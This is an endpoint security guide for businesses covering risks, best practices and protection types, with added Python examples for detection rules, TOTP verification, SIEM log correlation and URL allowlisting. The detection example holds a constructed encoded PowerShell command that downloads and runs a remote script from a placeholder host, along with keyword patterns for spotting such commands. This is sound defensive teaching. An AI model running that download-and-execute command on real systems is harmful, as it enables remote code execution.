Endpoints, from workers’ laptops and mobile devices to virtual desktops, remain a major security risk to your business. Anything that connects to the company network is a potential threat and needs securing to prevent viruses, malware, ransomware and hacking attacks.
Endpoint security takes the lead role in protecting these devices and your business. While it should be one part of a layered IT defense, it represents the front line in the battle between attackers and your digital operations.
That frontline is called the perimeter: think of it as the trench between your business and the millions of automated attacks that are launched every day by hackers trying to break into businesses.
In this in-depth guide, we'll explore the following topics:
- What is endpoint security?
- Why is endpoint security vital?
- How does endpoint protection work?
- The biggest and most persistent endpoint security risks
- Endpoint security best practices
- What to look for in an endpoint security solution?
- The different types of endpoint protection
- Think beyond the endpoint with threat intelligence
- Final thoughts
What is endpoint security?
At its simplest, endpoint security is a set of applications or services that protect business networks from threats arriving through company computers, servers, mobiles or other devices, including printers. In industrial settings this also covers Internet of Things (IoT) devices, while retailers will find that point of sale (PoS) and kiosk terminals are points of risk.
While traditional antivirus and firewall tools protect the device, endpoint protection is focused on defending the business network and services from whatever threats appear across those devices.
Since an enterprise can have many thousands of notebooks or mobile devices in use at any one time, endpoint security tools need to be always up to date and constantly scanning for malicious internal and external threats.
Why is endpoint security vital?
Traditionally, all business computers, servers and printers were hard wired to the office network and operated within the perimeter. Now, with work from home (WFH), bring your own device (BYOD) and growing mobility trends, workers can access their office applications on a growing number of devices inside and outside the perimeter.
Highlighting the scope of the problem, extensive research in 2020’s The Third Annual Study on the State of Endpoint Security Risk showed that some 68% of respondents had witnessed one or more successful endpoint-based attacks on their network. This figure is up from 54% in 2017’s report, highlighting how both the volume of threats and the move to remote and hybrid working environments creates more opportunities for cybercriminals.
The same report reveals 73% of respondents indicate that “new and unknown threats” against their organizations have significantly increased, but only 44% have ample resources to deal with them, and only 27% find traditional antivirus solutions can stop these attacks.
All of this points to the need for modern endpoint solutions to combat the growing frequency of attacks, with successful intrusions now approaching $9 million in costs for enterprises (and potentially destroying smaller businesses entirely).
Every industry will be aware of stories of such devastating attacks. This timeline from the financial sector highlights their growing volume, including examples of breaches, leaks and ransomware cases.
How does endpoint protection work?
Having established the critical need for endpoint protection and its value in the workplace, it helps to understand how endpoint protection actually functions. IT would not be IT, however, without a myriad of overlapping terms and jargon.
At the basic level, endpoint protection platforms inspect data passing between a worker's device and the network, and activity on the device itself (processes launched, files written, settings changed), for signs of suspicious behaviour.
These solutions scan for viruses and malware while providing firewall and web filtering tools to protect workers and the business. They also monitor passing data, which can include emails, document files, network access requests, updates, password change requests and other items. All of these are assessed, and anything suspicious is reported to a central dashboard for inspection.
Endpoint protection is managed through a set of rules or policies that automatically block suspicious behaviour. Those rules can be updated automatically as new threats emerge. And, because endpoint protection will sometimes raise false positives, IT operators can create custom exceptions that allow specific activities without switching a rule off entirely.
Similarly, trusted devices that belong to the business might have different rules to “guest” BYOD devices to protect against the unwanted digital baggage that workers may bring in on their personal computers, phones or tablets. That could include legitimate apps that have some semi-legitimate but hidden spyware, malware-laden novelty apps or “fake” security apps that are actually malware.
Endpoint solutions can be on-premises, hybrid or cloud-managed, depending on the business operating model and its security needs. Cloud-managed solutions suit most businesses, reducing the need for in-house infrastructure while providing continuous monitoring, automated updates and centralized reporting. Much of this activity is automated, enabling IT professionals to focus on genuine incidents.
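To make the rules-and-exceptions model concrete, here is an added example (not code from the original article or from any vendor's product) of a tiny endpoint policy engine in Python. It evaluates constructed process-creation events against two rules: an encoded PowerShell command line that decodes to a download cradle (a common fileless technique, since the script never exists as a file on disk), and an Office application spawning a shell. The exception for a hypothetical svc_deploy account on build hosts shows how an operator allows a known false positive without disabling the rule. All hostnames, users, command lines and rule names are invented for illustration.

```python
"""Added example (not from the original article): a minimal endpoint policy
engine. Constructed process-creation events are checked against rules that
block suspicious behaviour; each rule can carry operator-defined exceptions
so a known false positive is allowed without switching the rule off."""
import base64
import re
from dataclasses import dataclass, field
from typing import Callable, List, Tuple


@dataclass
class Event:
    host: str
    user: str
    process: str   # image name of the new process
    parent: str    # image name of the parent process
    cmdline: str


@dataclass
class Rule:
    name: str
    matches: Callable[[Event], bool]
    exceptions: List[Callable[[Event], bool]] = field(default_factory=list)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded payload of a PowerShell -EncodedCommand argument,
    or '' if there is none. PowerShell expects UTF-16LE text in base64."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def fileless_download_cradle(ev: Event) -> bool:
    """PowerShell whose encoded script fetches and runs remote code."""
    if ev.process.lower() != "powershell.exe":
        return False
    body = decode_encoded_command(ev.cmdline)
    return bool(re.search(r"downloadstring|invoke-expression|\biex\b", body, re.I))


def office_spawns_shell(ev: Event) -> bool:
    """A document viewer has no business launching a command interpreter."""
    return (ev.parent.lower() in {"winword.exe", "excel.exe", "outlook.exe"}
            and ev.process.lower() in {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe"})


def deploy_account_on_build_host(ev: Event) -> bool:
    """Hypothetical exception: the deployment service account is known to run
    encoded PowerShell on build hosts, so allow it there without disabling the rule."""
    return ev.user == "svc_deploy" and ev.host.startswith("build-")


RULES = [
    Rule("powershell_encoded_download_cradle", fileless_download_cradle,
         exceptions=[deploy_account_on_build_host]),
    Rule("office_app_spawned_shell", office_spawns_shell),
]


def evaluate(ev: Event, rules=RULES) -> Tuple[str, str]:
    """Rules run in order and the first match decides. An exception turns a
    block into an allow but keeps the rule name, so the event stays visible
    for audit instead of silently disappearing."""
    for rule in rules:
        if rule.matches(ev):
            if any(exc(ev) for exc in rule.exceptions):
                return ("allow", "exception:" + rule.name)
            return ("block", rule.name)
    return ("allow", "")


def encode_powershell_command(script: str) -> str:
    """Encode a script the way 'powershell -enc' expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry); the URL is a placeholder.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = {
    "user_cradle": Event("lt-0042", "j.doe", "powershell.exe", "winword.exe",
                         "powershell.exe -nop -w hidden -enc " + encode_powershell_command(CRADLE)),
    "deploy_cradle": Event("build-07", "svc_deploy", "powershell.exe", "services.exe",
                           "powershell.exe -enc " + encode_powershell_command(CRADLE)),
    "excel_cmd": Event("lt-0042", "j.doe", "cmd.exe", "EXCEL.EXE", "cmd.exe /c whoami"),
    "benign": Event("lt-0042", "j.doe", "powershell.exe", "explorer.exe",
                    "powershell.exe -File C:\\Users\\j.doe\\tidy.ps1"),
}


def run_samples() -> dict:
    """Verdict for every constructed event, keyed by its label."""
    return {name: evaluate(ev) for name, ev in SAMPLE_EVENTS.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:14} -> {verdict}")
```

The design point is the audit trail: an exception returns "allow" together with the rule it overrode, so the dashboard can still show how often the exception fires and whether it is being abused.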
The biggest and most persistent endpoint security risks
Here are six of the biggest endpoint security risks all businesses will likely come across:
1. Malware
One of the most common threats, malware can hide within any application, update file or document. The most common delivery method is an “urgent” phishing email; one study attributed 96% of such attacks to email.
While most are obvious scams, phishing attempts are becoming increasingly sophisticated, with criminals crafting emails that look official and give a plausible business reason to open the attachment, which makes email the most common route for malware to spread.
And, as techniques evolve, fileless malware is on the rise: rather than dropping an executable on disk, it runs in memory or abuses legitimate built-in tools such as PowerShell and WMI. This leaves fewer artefacts for file-based scanners and forensic tools to find, or none at all, making intrusions harder to detect, react to and resolve.
2. Phishing
While phishing is the most common source of malware, it is also used for other types of attack. Phishing emails can be highly targeted, asking specific members of an accounts or finance team to transfer funds for an “urgent” project, or to share a password, personal details or other useful information.
Statistics suggest some 3.4 billion phishing emails are sent daily, and while many end up in the spam folder, it takes only one reaching a user at the wrong moment to trigger a destructive or disruptive chain of events. Spear phishing is the targeted variant, aimed at specific individuals with a convincing series of messages to get them to divulge information or take a particular action.
3. Ransomware
The most feared type of business disruption, ransomware encrypts a company's vital data files and holds them for a sizeable ransom, usually demanded in cryptocurrency. Research shows that a single security vendor detected some 700 million ransomware attacks in 2021, which it framed as approaching 10 attacks per company each business day.
Businesses large and small have been crippled by ransomware, and even those that pay (frequently millions of dollars) often do not get all their data back once the criminals vanish. Increasingly, attackers also steal data before encrypting it and threaten to publish it, so backups alone do not remove their leverage. Realistically, a business should aim to stop the malware arriving (endpoint security, email filtering), limit what it can reach (least privilege, segmentation) and keep tested, offline or immutable backups with a rehearsed disaster recovery plan so it can get back to work as quickly as possible.
4. Denial of Service attacks
Usually targeted at larger businesses or visible digital brands including banks, retailers and service providers, Distributed Denial of Service (DDoS) attacks see the attacker overwhelm a business or public-facing network, crashing it or locking legitimate users out.
Attacks are launched from thousands or millions of bots running on compromised devices spread across the internet, which makes the traffic hard to separate from legitimate users and impossible to block by source address alone. Taking down the botnet's command and control infrastructure is a job for law enforcement and the security vendors that track it; what a business can do itself is absorb or filter the flood upstream, through its ISP, a cloud scrubbing service or a content delivery network, and rehearse who does what when it happens. The endpoint angle is that compromised laptops, phones and IoT devices are the bots: keeping them patched and free of malware denies attackers their firepower.
DDoS attacks used to be short-lived and, while annoying, had only a short-term impact. In the 2020s, however, attacks last longer, are more targeted and adapt to the defender's mitigations, which makes them much tougher to shut down. One report put attacks up 11% in the first half of 2021, with growth continuing.
To defend against attacks, businesses can combine bot detection and traffic-scrubbing services, which also help trace where an attack is coming from, with rate limiting and spare capacity that limit the damage and keep services accessible.
5. Data loss
For many companies, data is the most valuable asset. Attackers will go to great lengths to access, steal or delete it to cause business damage, whether as part of a ransomware, blackmail or espionage effort.
Data loss is not only the result of direct attacks; it is often the product of a long-term social engineering effort, with some intruders hiding inside a network for months, seeking valuable information and waiting for the right moment to act.
6. End users
For all the technology and digital defenses a business can buy, the number one weak point in any system is its users: IBM research found human error to be a contributing factor in 95% of security incidents.
Attackers rely on a person to trigger most of their attacks, so as well as spending on digital defenses, every business should invest in training and awareness so that workers do not run malware or click on the wrong link.
Clear guidelines, reinforced through live testing and exercises, protect both users and the business from these attacks. On top of this, mandating strong passwords or passphrases, backed by multi-factor authentication, keeps user accounts and the services they use safe.
Endpoint security best practices
To protect the business against these risks and other emerging threats, security professionals need to use the right endpoint solutions and adopt best practices that ensure scalable and flexible protection.
1. Least privilege access
When setting up the digital services across your business, keep track of who has access to which applications. Least-privilege access means, for example, that only staff in accounts or management can reach financial applications, while only sales or support can open files containing customer information; everyone else is denied by default.
For some applications users should have read-only access, and business-critical applications should require multi-factor authentication to access or change anything. Privileged Access Management (PAM) tools control and record administrative access, while joiner-mover-leaver processes (ideally driven from the HR system through an identity management tool) ensure that people who move departments or leave the company lose the access they no longer need. Access rights should also be reviewed periodically, because they accumulate over time.
2. Provide employee training
As mentioned, employees are often the weakest link in cybersecurity, especially as every worker will have access to some type of IT device. Security awareness training at onboarding, covering how to identify risks and when to report concerns, is key, and regular refreshers through simulated phishing tests and quizzes reinforce the practices all workers should follow.
IT systems should ensure that users create strong, unique passwords or passphrases on day one and change them promptly if compromise is suspected (forced rotation on a calendar tends to produce weaker, predictable passwords). On top of this, all OS, application and security updates should install automatically. Ultimately, educating employees complements the technology; neither is sufficient on its own.
3. Multi-factor authentication (MFA)
Along with stronger passwords, workers should be required to complete multi-factor authentication when accessing business-critical applications. Authenticator apps that generate time-based one-time codes, or hardware security keys, tie the second factor to a separate device rather than to the email address an attacker may already control. SMS codes are better than nothing, but they can be intercepted or captured through SIM swapping, so app- or hardware-based factors are preferable where possible.
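As an added example (not from the original article, and not any vendor's authenticator code), here is the time-based one-time password algorithm that authenticator apps implement (TOTP, RFC 6238, built on HOTP from RFC 4226), written with Python's standard library, together with the server-side check a practitioner actually needs: a small clock-drift window, constant-time comparison, and replay protection so a code that was phished or shoulder-surfed cannot be reused. The secret is the RFC's published test secret; the issuer and account name are invented.

```python
"""Added example (not from the original article): the TOTP algorithm that
authenticator apps implement (RFC 6238, built on HOTP from RFC 4226) and a
server-side verifier with drift tolerance and replay protection."""
import base64
import hashlib
import hmac
import secrets
import struct
import time
from typing import Optional
from urllib.parse import quote

# Shared secret from the RFC 4226/6238 test vectors; real secrets come from new_secret().
RFC_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """HOTP (RFC 4226): HMAC over the 8-byte big-endian counter, dynamic
    truncation to 31 bits, then the low `digits` decimal digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6, algo=hashlib.sha1) -> str:
    """TOTP (RFC 6238): HOTP with the counter derived from Unix time."""
    return hotp(secret, at // step, digits, algo)


def new_secret(nbytes: int = 20) -> bytes:
    """Per-user shared secret; 20 random bytes matches the SHA-1 key size."""
    return secrets.token_bytes(nbytes)


def provisioning_uri(secret: bytes, issuer: str, account: str,
                     digits: int = 6, step: int = 30) -> str:
    """otpauth:// URI that authenticator apps read from a QR code. The secret
    is base32 without padding, which is what the apps expect."""
    b32 = base64.b32encode(secret).decode("ascii").rstrip("=")
    label = quote(f"{issuer}:{account}")
    return (f"otpauth://totp/{label}?secret={b32}&issuer={quote(issuer)}"
            f"&algorithm=SHA1&digits={digits}&period={step}")


class TotpVerifier:
    """Server-side verifier. Accepts codes from `window` steps either side of
    now (clock drift), compares in constant time, and records the last
    accepted step so the same code cannot be replayed within its lifetime."""

    def __init__(self, secret: bytes, step: int = 30, digits: int = 6,
                 window: int = 1, algo=hashlib.sha1):
        self.secret, self.step, self.digits, self.window, self.algo = secret, step, digits, window, algo
        self.last_counter = -1  # highest time step already used for a successful login

    def verify(self, code: str, now: Optional[int] = None) -> bool:
        if now is None:
            now = int(time.time())
        code = code.strip().replace(" ", "")
        if not code.isdigit() or len(code) != self.digits:
            return False
        current = now // self.step
        for counter in range(current - self.window, current + self.window + 1):
            if counter <= self.last_counter:
                continue  # that step (or an older one) already authenticated: replay
            expected = hotp(self.secret, counter, self.digits, self.algo)
            if hmac.compare_digest(expected, code):
                self.last_counter = counter
                return True
        return False


if __name__ == "__main__":
    print("enrol with:", provisioning_uri(RFC_SECRET, "Example Corp", "j.doe@example.com"))
    print("current code:", totp(RFC_SECRET, int(time.time())))
```

The window of one step each side is the usual trade-off between tolerating phone clock drift and widening the guessing target; whatever window you pick, the replay check is what stops an attacker who phishes a live code from using it a second time, and rate limiting attempts per account is still required because six digits can be brute-forced.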
4. Network segmentation
Enterprises are already big users of segmented networks, and companies adopting cloud services benefit from the same principle. By separating networks and data, a business can keep key assets such as customer information, corporate data, financial records and valuable intellectual property away from the general network, so that a compromised laptop on the general network cannot reach them directly and a breach stays contained.
Each segment has its own microperimeter, allowing IT to apply stricter access rules, and even different endpoint security tooling, to each one.
5. Endpoint scans
When a device tries to connect to the network, a posture (health) check can establish whether it should be trusted. The check queries the device to confirm it is authorized to join, that it is patched, and that it is running current, approved security software; devices that fail can be quarantined until fixed.
While this protects the business, it can also highlight users who have disabled key apps or tried to use non-authorized software on their device.
6. Secure and encrypt your endpoints
As part of the endpoint security process, a key element is hardening and encrypting the endpoints themselves. Endpoint encryption adds another layer of protection: full-disk encryption protects data at rest if a laptop is lost or stolen, and transport encryption (TLS or a VPN) protects data moving between devices and networks.
Endpoint tools also protect the operating system from attack. Common criminal tools such as keyloggers and network sniffers are used to capture what people type, including passwords, and to spy on traffic; endpoint tools can identify and disable them to protect users and the business.
7. Utilize security information and event management tools
A growing part of IT security is the rise of Security Information and Event Management (SIEM) tools. For large enterprises or data-heavy businesses, these collect logs and events from across the network, endpoints included, and flag anything suspicious.
SIEM tools correlate events from many sources, automate the first steps of triage and help analysts make sense of massive volumes of reporting data, so that breaches are identified sooner and the impact of any intrusion or attack is reduced.
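As an added example (not from the original article or from any SIEM product), here is the kind of correlation rule a SIEM runs, written in plain Python over a constructed sshd-style log: five or more failed logins for one user from one source within 60 seconds followed by a success raises a brute-force alert, and one source failing against five or more different usernames within the window raises a password-spray alert. Hostnames, usernames and addresses are invented (the addresses come from documentation ranges); the log format mimics OpenSSH but every line is constructed.

```python
"""Added example (not from the original article): two SIEM-style correlation
rules run over constructed sshd-like log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List, NamedTuple

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})Z (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+)"
)


class AuthEvent(NamedTuple):
    ts: datetime
    host: str
    outcome: str  # "Failed" or "Accepted"
    user: str
    src: str


def parse(text: str) -> List[AuthEvent]:
    """Normalize raw lines into events; lines the pattern does not cover are
    skipped rather than breaking the pipeline. Output is sorted by time."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(AuthEvent(datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S"),
                                    m["host"], m["outcome"], m["user"], m["src"]))
    return sorted(events, key=lambda e: e.ts)


def detect(events: List[AuthEvent], fail_threshold: int = 5, window_s: int = 60,
           spray_users: int = 5) -> List[Dict]:
    """Sliding-window correlation producing two alert types:
    brute_force_then_success: >= fail_threshold failures for (src, user)
      within window_s, followed by an Accepted login for the same pair;
    password_spray: one src failing against >= spray_users distinct users
      within window_s (raised once per source)."""
    alerts: List[Dict] = []
    failures = defaultdict(deque)                          # (src, user) -> failure times
    users_by_src: Dict[str, Dict[str, datetime]] = defaultdict(dict)  # src -> user -> last failure
    sprayed = set()

    def expired(then: datetime, now: datetime) -> bool:
        return (now - then).total_seconds() > window_s

    for ev in events:
        q = failures[(ev.src, ev.user)]
        while q and expired(q[0], ev.ts):
            q.popleft()
        if ev.outcome == "Failed":
            q.append(ev.ts)
            seen = users_by_src[ev.src]
            seen[ev.user] = ev.ts
            for u in [u for u, t in seen.items() if expired(t, ev.ts)]:
                del seen[u]
            if len(seen) >= spray_users and ev.src not in sprayed:
                sprayed.add(ev.src)
                alerts.append({"rule": "password_spray", "src": ev.src,
                               "users": len(seen), "at": ev.ts.isoformat()})
        elif len(q) >= fail_threshold:  # Accepted after a burst of failures
            alerts.append({"rule": "brute_force_then_success", "src": ev.src,
                           "user": ev.user, "failures": len(q), "at": ev.ts.isoformat()})
            q.clear()
    return alerts


# Constructed log (not real data): a brute force against alice that succeeds,
# a benign typo by bob, a line the parser ignores, and a spray from one source.
SAMPLE_LOG = """\
2024-05-01T09:00:01Z bastion sshd[2211]: Failed password for alice from 203.0.113.5 port 51022 ssh2
2024-05-01T09:00:04Z bastion sshd[2211]: Failed password for alice from 203.0.113.5 port 51023 ssh2
2024-05-01T09:00:07Z bastion sshd[2211]: Failed password for alice from 203.0.113.5 port 51024 ssh2
2024-05-01T09:00:10Z bastion sshd[2211]: Failed password for alice from 203.0.113.5 port 51025 ssh2
2024-05-01T09:00:13Z bastion sshd[2211]: Failed password for alice from 203.0.113.5 port 51026 ssh2
2024-05-01T09:00:15Z bastion sshd[2211]: Failed password for bob from 192.0.2.9 port 40110 ssh2
2024-05-01T09:00:19Z bastion sshd[2211]: Accepted password for bob from 192.0.2.9 port 40110 ssh2
2024-05-01T09:00:19Z bastion sshd[2211]: pam_unix(sshd:session): session opened for user bob(uid=1001) by (uid=0)
2024-05-01T09:00:21Z bastion sshd[2211]: Accepted password for alice from 203.0.113.5 port 51027 ssh2
2024-05-01T09:01:00Z bastion sshd[2212]: Failed password for invalid user bob from 198.51.100.7 port 33001 ssh2
2024-05-01T09:01:02Z bastion sshd[2212]: Failed password for carol from 198.51.100.7 port 33002 ssh2
2024-05-01T09:01:04Z bastion sshd[2212]: Failed password for dave from 198.51.100.7 port 33003 ssh2
2024-05-01T09:01:06Z bastion sshd[2212]: Failed password for erin from 198.51.100.7 port 33004 ssh2
2024-05-01T09:01:08Z bastion sshd[2212]: Failed password for frank from 198.51.100.7 port 33005 ssh2
2024-05-01T09:01:10Z bastion sshd[2212]: Failed password for grace from 198.51.100.7 port 33006 ssh2
2024-05-01T09:01:30Z bastion sshd[2213]: Failed password for heidi from 198.51.100.7 port 33007 ssh2
"""


def run_sample() -> List[Dict]:
    return detect(parse(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Two things the example makes visible that a product hides: the thresholds and window are tuning knobs that trade false positives (a user mistyping a password five times) against missed attacks, and the spray rule keys on the source while the brute-force rule keys on the source and user pair, which is why the spray does not trip the brute-force rule and vice versa.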
8. Bring your own device
When it comes to BYOD, the business can save a fortune on device costs but finds itself exposed to whatever else users have installed. To protect the business, IT should enforce a baseline of security policies for all devices (screen lock, minimum OS version, no jailbroken or rooted devices), along with an acceptable use policy so that people do not use them for dubious purposes.
That might include mining cryptocurrencies, which may be legitimate on a personal device but is a common cover for malware. Mobile Device Management (MDM) software can be installed on iOS and Android devices to enforce such rules, and can remove work data and applications remotely when a worker leaves. Having a clear policy for all staff is key to protecting the business.
9. Automated patching
Most cloud applications update automatically, but where a business has on-premises or hybrid systems, the value of automated patching mostly outweighs the benefit of waiting to see whether an update causes problems.
For security applications this is critical: detection content is updated daily with the latest threats, and when a zero-day is disclosed an emergency patch or signature can mitigate it. For business-critical applications, IT may want to test an update in a staging environment before rolling it out company-wide, especially for legacy systems, but for modern applications there are fewer reasons to delay.
What to look for in an endpoint security solution?
Businesses value automation and ease of use in all applications, especially as remote work and BYOD increases. Features like continuous monitoring, automated alerts and response and integrated threat management are all key features to look for in an endpoint security solution.
The different types of endpoint protection
There are around a dozen different types of endpoint security protection, with more being added as new types of threat appear. Some will be bundled or integrated into a single service or application, simplifying the buying and adoption process, while others are more specialist.
1. Next-generation antivirus
Traditional antivirus solutions alone don’t guarantee protection for the business and its network. Large enterprises with more widespread endpoints are vulnerable to a whole range of risks that virus solutions do not protect from.
Next-generation AV solutions have a broader feature set and make use of AI and machine learning algorithms to detect new threats on the fly, with cloud-based analytics helping support anomaly detection.
These systems can help identify threats that are overlooked by traditional systems, protecting endpoints while being easier to maintain, install and update compared to legacy systems.
However, antivirus is not a complete endpoint solution on its own. Endpoint tools work alongside it, monitoring every endpoint in real time wherever workers are located and analyzing the telemetry to identify attack patterns. Next-generation antivirus is therefore one component of an integrated endpoint solution, not the whole of it.
2. Endpoint Detection and Response (EDR)
Since antivirus tools will not stop every threat, visibility into what is happening on endpoints is needed to catch what slips past them. Endpoint detection and response (EDR) continuously records process, file, network and registry activity on each host, supports automated and analyst-led investigation of suspicious behaviour, and lets responders isolate a host or kill a process remotely.
EDR adds these capabilities to help protect data and services, while helping block advanced threats and attacks that signature-based tools miss.
3. Endpoint encryption
Your data is of little use to a criminal if it is encrypted and they lack the key, which is why more businesses are adopting encryption across services and endpoint devices to protect files and information. There are various types of encryption (full-disk, file-level, transport and end-to-end messaging) suited to different use cases. Understanding where each endpoint, application or service applies encryption, and where the data is necessarily in the clear (for instance, once a logged-in user, or a process running as that user, opens a file), is a key part of ensuring the business is defended; disk encryption, for example, does nothing against ransomware running under the user's own account.
4. Network access control
Firewalls were once considered enough to protect a business network, but in the current landscape next-generation firewalls and network access control, which admits a device only after its identity and patch state are verified, need to work with endpoint security to provide a layered defense.
Some endpoint security tools include a host-based firewall on each endpoint; its protection travels with the device and enforces policy on traffic a perimeter firewall never sees, such as a laptop on home Wi-Fi, and it supports compliance with rules and regulations beyond what a traditional firewall offers.
However, as firewalls often act as the first line of defense for networks in the event of a cyberattack, ensuring they’re properly configured is a must for security professionals.
5. Secure email gateways
Email is still the primary method of business communication, and also the primary route for criminals and hackers looking to gain access to networks. The growing sophistication of phishing and other email-borne attacks calls for secure email gateways. These can quarantine suspicious emails and attachments before they reach a user's inbox, reducing the risk of compromise and attack.
6. Application control
We’ve already discussed why BYOD increases risk through the use of unapproved applications. Application control is a facet of endpoint security that can prevent such applications being installed or launched.
Users may notice application control mainly as the thing that stops them playing games, but its real value is blocking the endless stream of fake security, social media and other applications that come with their own malware payloads or give attackers a foothold to download more malicious tools. Allowlisting known-good executables is the stronger form; blocklisting known-bad ones always lags behind the attacker.
7. Insider threat prevention
While much of this article is focused on external business threats, there remains the risk that an insider might try to steal data or install malware deliberately to target the business. This risk grows as contractors, third-parties and partner businesses gain access to your services.
Insider threat prevention requires technical features like app blocking and restricting access to critical data, but it also demands adaptive changes to networks and services as users come and go, as well as a culture of risk prevention that stops people sharing information casually.
8. Data loss prevention
Data loss prevention (DLP) tools on the endpoint watch for sensitive data leaving it. Rules classify files and content (customer records, card numbers, source code) and then block or flag attempts to email them externally, copy them to removable media, print them or upload them to unsanctioned cloud services.
Regulations and standards such as GDPR, HIPAA and PCI-DSS set out how business data must be protected; following them reduces the risk of fines or litigation if the business does suffer a data loss.
9. Cloud perimeter security
As the network perimeter dissolves in the cloud era, businesses need additional controls to keep that perimeter secure even as it evolves. Identity and access management ensures that only valid users can cross it, while VPN and software-defined WAN tools become increasingly common ways of reaching the network.
10. URL filtering
A feature of most firewalls and web proxies, URL filters check the sites users try to access against an allowlist of approved sites, or a blocklist of known-malicious ones. Preventing employees from reaching sites where malware or other unwanted content may reside is a useful part of endpoint protection that keeps users, devices and their data secure.
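As an added example (not from the original article), the following Python shows the host comparison at the core of an allowlist-based URL filter, beside the naive substring check it replaces and the URLs that check gets wrong: it approves notexample.com, example.com.evil.test, and any URL that merely mentions the approved domain in its query string or userinfo. The allowlist entries and test URLs are invented.

```python
"""Added example (not from the original article): allowlist-based URL
filtering done on the parsed host, beside the naive substring check that
attackers routinely bypass."""
from typing import Iterable, List, Optional
from urllib.parse import urlsplit

# Hypothetical allowlist of approved domains; their subdomains are allowed too.
ALLOWLIST = frozenset({"example.com", "intranet.example.net"})


def canonical_host(url: str) -> Optional[str]:
    """Return the host a browser would actually connect to, or None if the
    URL is not a plain web URL. urlsplit() lower-cases the host and drops
    userinfo ('user@') and the port, so 'https://example.com@evil.test/'
    yields 'evil.test'."""
    parts = urlsplit(url.strip())
    if parts.scheme not in ("http", "https"):
        return None
    host = parts.hostname
    if not host:
        return None
    host = host.rstrip(".")  # 'example.com.' is the same host as 'example.com'
    try:
        # Internationalized names go through IDNA so that a look-alike such as
        # 'exämple.com' compares as 'xn--exmple-cua.com', not as the real domain.
        return host.encode("idna").decode("ascii")
    except UnicodeError:
        return None


def is_allowed(url: str, allowlist: Iterable[str] = ALLOWLIST) -> bool:
    """Allow only if the host is an approved domain or a subdomain of one."""
    host = canonical_host(url)
    if host is None:
        return False
    return any(host == d or host.endswith("." + d) for d in allowlist)


def naive_is_allowed(url: str, allowlist: Iterable[str] = ALLOWLIST) -> bool:
    """The common mistake: approve the URL if an approved domain appears
    anywhere in it. Kept only to show what it gets wrong."""
    return any(d in url.lower() for d in allowlist)


# Constructed test URLs, each paired with the verdict a correct filter gives.
SAMPLES = [
    ("https://example.com/reports", True),
    ("https://docs.example.com/page", True),
    ("HTTPS://EXAMPLE.COM./", True),
    ("https://notexample.com/", False),
    ("https://example.com.evil.test/login", False),
    ("https://evil.test/?next=https://example.com", False),
    ("https://example.com@evil.test/", False),
    ("https://exämple.com/", False),
    ("ftp://example.com/", False),
]


def bypasses_of_naive_check() -> List[str]:
    """URLs the naive check approves that the host-based check rightly rejects."""
    return [u for u, ok in SAMPLES if not ok and naive_is_allowed(u)]


if __name__ == "__main__":
    for url, expected in SAMPLES:
        print(f"{url:45} host-based={is_allowed(url)!s:5} naive={naive_is_allowed(url)!s:5} expected={expected}")
```

The lesson generalizes to any allowlist of names: compare the parsed, canonicalized host as a whole label sequence (exact match or a dot-separated suffix), never as a substring of the raw string.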
Think beyond the endpoint with threat intelligence
The wide array of tools mentioned above increasingly comes with threat intelligence and machine learning built in to simplify monitoring and reporting. These help close the gaps in endpoint threat prevention left by next-generation antivirus and visibility tools such as EDR, both of which remain critical for identifying threats.
Businesses need to understand the benefits of these intelligence tools, their weaknesses and how they integrate with other features to build an endpoint security strategy that’s strong in threat hunting and identification.
Features such as hypothesis-driven threat hunting and indicators of attack (descriptions of attacker behaviour, as opposed to indicators of compromise such as a known file hash) help the business identify risk, pre-empt attacks or realize that it is under attack earlier than before.
This is just as well: as AI becomes smarter and a more common feature of security tools, criminals are also starting to use AI to find smarter ways to attack networks, endpoints and businesses.
In the never-ending battle between businesses and criminals, a wide range of protection across networks and endpoints is stronger than reliance on a couple of traditional tools. Being able to detect, analyze and block threats quickly could be the difference between a hectic few hours and total business failure.
While it might take some effort to build the best endpoint security, starting now and deploying fast is better than leaving it to a traditional RFP and query process. Fortunately, there are many tools and suites available that provide best-of-breed protection that will secure any business today and help them build a flexible defense for their digital future.
- 5 Firewall Management Challenges and How to Solve Them
- A Guide to Replacing Antivirus with Advanced Endpoint Security
- Endpoint Security Buyers Guide